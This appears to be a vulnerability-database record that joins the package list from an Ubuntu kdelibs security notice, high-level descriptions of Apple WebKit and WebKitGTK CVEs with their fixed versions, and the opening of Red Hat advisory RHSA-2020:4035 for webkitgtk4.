http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 1376552 ca7b84a5ea9c36ca36d51b113335ab70
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 9596082 29426bec2f7943549b046d8aced4172d
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4-0ubuntu1~intrepid1.2.diff.gz
Size/MD5: 94086 bca07843a8dbb43504199cf28f5e5e66
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4-0ubuntu1~intrepid1.2.dsc
Size/MD5: 2308 42bc5a6639b095c402aa1336159b958a
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4.orig.tar.gz
Size/MD5: 11190299 18264580c1d6d978a3049a13fda36f29
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1.diff.gz
Size/MD5: 720448 8dc9da15189485cac9374322825bccbc
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1.dsc
Size/MD5: 2284 e99a996b350144fdf4bef83e6f339ce5
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.orig.tar.gz
Size/MD5: 18631467 5eeb6f132e386668a0395d4d426d495e
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-data_4.1.4-0ubuntu1~intrepid1.2_all.deb
Size/MD5: 3110640 8abefbf8d9f4c168a645761589c2935e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-doc_4.1.4-0ubuntu1~intrepid1.2_all.deb
Size/MD5: 68582 86eda9548527b86c791c29789ed7fe28
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 7321518 162272e6155b3cd9f3ea08c566b80e5b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 25522224 a0ce548bf6862e68285df52ac391c429
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 2270 650ab9bbf7f9748a9344495da23a2c82
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 395434 02fdee1fed9ff829a045d3785730d2fd
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 66055728 a8c41d8a9dc4e540a2c7d0c8199799a4
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 1440484 79881c87f9bd56d377790807842c3dcb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 10104606 421e72c07c231a7a68bcbca2c8069062
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 27376386 59c3b6c1110365d63e1da80c363b96da
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 1371456 f25f7f7b7fbc0c99df8ca1f2e734a64c
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 10929852 e55ab2261280a73df4d75b9a0112ec87
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 371576 68138ccb311714315e34a88645c29b33
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 65218012 5fd7fa06fa0d28c98f75c58b3c8130ee
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 1437924 c1df5e2b5b8aa17774b23e651b9a88ee
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 9524338 f0a135714a94aefab44f7380a40e967f
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 26665042 cf31490fcc88f793c5ea6175b29b4df3
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 1404872 d383c99760eb1c92ab22a52bd6f33d4e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 10144008 7e596d9e1464e5d016f674fb5d73b869
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 376410 ffc3b92e989c2a301559ebeea2f03d6e
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 65334318 d54fd6082a0ab4c1d324759379674b3d
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 1440518 01b987ef5588a94e82dbffa4f5afd1a1
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 9536660 c3369e8abf325a91ab192e1349c3ecb2
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 26674802 9de5792962f3c0bb21358f44aa000267
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 1368306 b21739dc8c80f55ce0205efcdd2f2e08
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 10141386 ee45606aa19cc8ceaeb73c5d4e6048c5
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 422856 6467cb43fcd16c4d6db7ff5053aaec1b
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 69277942 6820294b0c9505435fbff224c1a4f4f2
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 1445424 99b6afac70dead785c3211a9e92516f6
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 10239400 be1872cf9859bf46176a2d485584134f
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 28217616 c2360441a42e8b9d8b91120b38d8ba51
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 1380892 2841eff5fc2a0a50227ca9a8d34c0a3b
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 10748632 f6e7de17cd38ee62c1f082a4fb218949
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 381184 1718118e08731a9690a5ce00f0c9f88b
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 64515916 f380c0a0865f4dbaad6b7e2d22d93294
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 1437568 14c1a84e7a518b443b0e851ef41f9ada
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 9653946 803926ff9f9cc59a2f728d1aef8affbd
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 25440578 311423fbaa788d51978e7857010c9242
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 1368492 d4364357c5450b07aca1aa8981d96290
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 9800480 4dc89a5d63ce16463a822f16fb82f3d7
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2-0ubuntu5.1.diff.gz
Size/MD5: 102579 71b53faad8570c6ad92c0fc5e6aa4dfb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2-0ubuntu5.1.dsc
Size/MD5: 2305 558c2bdbbdb899c71197683df45fc75d
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2.orig.tar.gz
Size/MD5: 12335659 83d6a0d59e79873bbe0a5a90ef23f27e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1.diff.gz
Size/MD5: 724421 c73109ccdfb1d6c01eda7b6c0b4934a2
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1.dsc
Size/MD5: 2342 8ee55c88b43902a23d127d14917511be
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1.orig.tar.gz
Size/MD5: 18639393 4bcfee29b0f939415791f5032a72e7b0
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-data_4.2.2-0ubuntu5.1_all.deb
Size/MD5: 1991468 99747c4c57d32b9d7477ff0c418cbd1b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10.dfsg.1-1ubuntu8.1_all.deb
Size/MD5: 6751880 d7dfaf8fc4b8e658722a2beaaa3403d6
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1_all.deb
Size/MD5: 2272 fcf90c11a73566f41fd0eb5b54c4ee8f
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 280594 b0ccdd311755d4d73e4ae5c14b749c41
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 44148058 a7db92bd1bcf982314b0b89c1651a39b
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 1091210 b5430381f4c37424295eed580303a58c
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 7069750 e38c9e852339ef6c2134421765ed4eeb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 102446 4370939a24e6e0783da79e4781a63b33
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 611834 f61383e1830f92ed8ce2331ce4b8a366
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 27110136 a617a5b148e5e78f3b8523198869c8b0
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 1360082 d22364103ba04d238e9c6ce6632132c4
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 10782444 6fea32d8dd41bfae44c2c6392e74928d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 268936 55d68e9bbd600e288721479d2b90e16e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 43456236 4fe778549740544eb1304cfba184d899
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 1090396 db9306ddd8d1029b523ef398cb0acfcb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 6775516 374ea41072ec5221589c5f022f648434
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 126910 e4dbfd8386ea15fb613d7d56c971fd5e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 569616 b83e42d5f01e5e64ebb376820855771d
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 26382844 e88d283fb997e17aa96e8d7b0d6ca41e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 1394762 97bb37a8d0c8d60e278b671e14ee678b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 10006808 1e023a799c01aa6826ec770afbd68c90
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 275124 9779e3644ebfe8d78b7a4e3ffbf911f1
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 43588032 45eed1b291e0bd64bbbbbb3310d0f627
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 1092816 f7f13887c87e7ff27ae68785010e6720
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 6849342 b864a2c9fa03c050581a3102194adc1b
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 102444 7fee9a94b561c3fc03eac8de41b9ced5
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 599800 9a75c9c7a63848de9c911e45370556e4
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 26385234 73d6c254de10b86ee1c4e042ad6af402
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 1356828 d361a888c74d0c508876404cbcad4af5
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 10020040 4f9bc1c45c3dd04185de146cb1d1f4fd
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 269632 341b2a4e4e1dc63aa429a525ac5a2cd4
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 43129040 2288d1735b6c017024e04702626a139d
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 1089846 b7ce576938df67875e4cd0e61c86f9cd
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 6201830 fa9f8330ab5390563e78f2dbdce2e3e5
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 102426 1cc244e9262435b1779586108b2388af
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 554306 bc91379d58e2cc610671b092fcacbeb5
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 27928600 45b14e2a27fba6bd686880d8db9df586
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 1369304 3d402371b107efa1a35551ebf4d5b502
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 10611572 a85ed7be116a175427d9da3ab4d1325f
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 249574 e2e1b89231e89f4756c5abf11fc3f336
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 40331324 5505211faa8ff8b08be22e533dd49dff
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 1086200 4f8049b2f341873fd26ecb2b03b1ba21
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 5941632 a62ca018afa73d9d42feabd7cd12e534
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 102468 6e6a2473358e87b7866b4844659d5a85
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 529504 cc978af233ef52e1211e52ad00199cb0
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 25158764 020573ace30e4a179891aec0abe60149
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 1356898 a5c04c3bfce3e79bac6ad5be6b97e212
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 9662850 c7a7204aede16a1951ec1af8a26b4d1c
|
|
var-201912-0618
|
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Insufficient access restrictions * Privilege escalation * Service operation interruption (DoS) * Sandbox avoidance * Information falsification * information leak * Arbitrary code execution. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of FontFace objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. WebKit is prone to a information-disclosure and multiple memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. Apple macOS Mojave is a dedicated operating system developed for Mac computers. A resource management error vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 12.3; macOS Mojave prior to 10.14.5; tvOS prior to 12.3; Windows-based iCloud prior to 10.4, prior to 7.12; Windows-based iTunes prior to 12.9.5; Safari versions earlier than 12.1.1. WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization. This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-6237)
WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-8601)
An out-of-bounds read was addressed with improved input validation. (CVE-2019-8644)
A logic issue existed in the handling of synchronous page loads. (CVE-2019-8689)
A logic issue existed in the handling of document loads. (CVE-2019-8719)
This fixes a remote code execution in webkitgtk4. No further details are available in NIST. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. (CVE-2019-8766)
"Clear History and Website Data" did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)
An issue existed in the drawing of web page elements. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)
This issue was addressed with improved iframe sandbox enforcement. (CVE-2019-8846)
WebKitGTK up to and including 2.26.4 and WPE WebKit up to and including 2.26.4 (which are the versions right prior to 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. (CVE-2020-10018)
A use-after-free flaw exists in WebKitGTK. A malicious website may be able to cause a denial of service. A DOM object context may not have had a unique security origin. A file URL may be incorrectly processed. (CVE-2020-3885)
A race condition was addressed with additional validation. An application may be able to read restricted memory. (CVE-2020-3901)
An input validation issue was addressed with improved input validation. (CVE-2020-3902).
Installation note:
Safari 12.1.1 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkitgtk4 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:4035-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4035
Issue date: 2020-09-29
CVE Names: CVE-2019-6237 CVE-2019-6251 CVE-2019-8506
CVE-2019-8524 CVE-2019-8535 CVE-2019-8536
CVE-2019-8544 CVE-2019-8551 CVE-2019-8558
CVE-2019-8559 CVE-2019-8563 CVE-2019-8571
CVE-2019-8583 CVE-2019-8584 CVE-2019-8586
CVE-2019-8587 CVE-2019-8594 CVE-2019-8595
CVE-2019-8596 CVE-2019-8597 CVE-2019-8601
CVE-2019-8607 CVE-2019-8608 CVE-2019-8609
CVE-2019-8610 CVE-2019-8611 CVE-2019-8615
CVE-2019-8619 CVE-2019-8622 CVE-2019-8623
CVE-2019-8625 CVE-2019-8644 CVE-2019-8649
CVE-2019-8658 CVE-2019-8666 CVE-2019-8669
CVE-2019-8671 CVE-2019-8672 CVE-2019-8673
CVE-2019-8674 CVE-2019-8676 CVE-2019-8677
CVE-2019-8678 CVE-2019-8679 CVE-2019-8680
CVE-2019-8681 CVE-2019-8683 CVE-2019-8684
CVE-2019-8686 CVE-2019-8687 CVE-2019-8688
CVE-2019-8689 CVE-2019-8690 CVE-2019-8707
CVE-2019-8710 CVE-2019-8719 CVE-2019-8720
CVE-2019-8726 CVE-2019-8733 CVE-2019-8735
CVE-2019-8743 CVE-2019-8763 CVE-2019-8764
CVE-2019-8765 CVE-2019-8766 CVE-2019-8768
CVE-2019-8769 CVE-2019-8771 CVE-2019-8782
CVE-2019-8783 CVE-2019-8808 CVE-2019-8811
CVE-2019-8812 CVE-2019-8813 CVE-2019-8814
CVE-2019-8815 CVE-2019-8816 CVE-2019-8819
CVE-2019-8820 CVE-2019-8821 CVE-2019-8822
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-11070 CVE-2020-3862
CVE-2020-3864 CVE-2020-3865 CVE-2020-3867
CVE-2020-3868 CVE-2020-3885 CVE-2020-3894
CVE-2020-3895 CVE-2020-3897 CVE-2020-3899
CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-10018 CVE-2020-11793
====================================================================
1. Summary:
An update for webkitgtk4 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
3. Description:
WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+
platform. These packages provide WebKitGTK+ for GTK+ 3.
The following packages have been upgraded to a later upstream version:
webkitgtk4 (2.28.2). (BZ#1817144)
Security Fix(es):
* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251,
CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544,
CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571,
CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594,
CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,
CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644,
CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,
CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677,
CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683,
CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689,
CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720,
CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763,
CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769,
CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816,
CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823,
CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862,
CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885,
CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900,
CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 7.9 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
